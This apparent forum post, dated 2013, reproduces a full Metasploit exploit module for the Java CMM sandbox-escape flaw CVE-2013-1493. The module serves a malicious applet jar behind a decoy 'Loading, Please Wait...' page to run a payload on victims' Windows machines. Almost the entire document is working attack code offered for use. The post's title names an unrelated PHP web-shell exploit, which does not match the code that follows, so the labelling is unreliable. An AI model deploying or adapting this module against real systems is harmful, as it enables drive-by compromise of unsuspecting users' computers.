STUNSHELL PHP Web Shell Remote Code Execution

Original poster, posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped in the framework's data directory.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The entry-point class gets a random name for each run.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve either the applet jar or the HTML loader page depending on the requested URI.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)

      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }

      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|

    return html
  end

end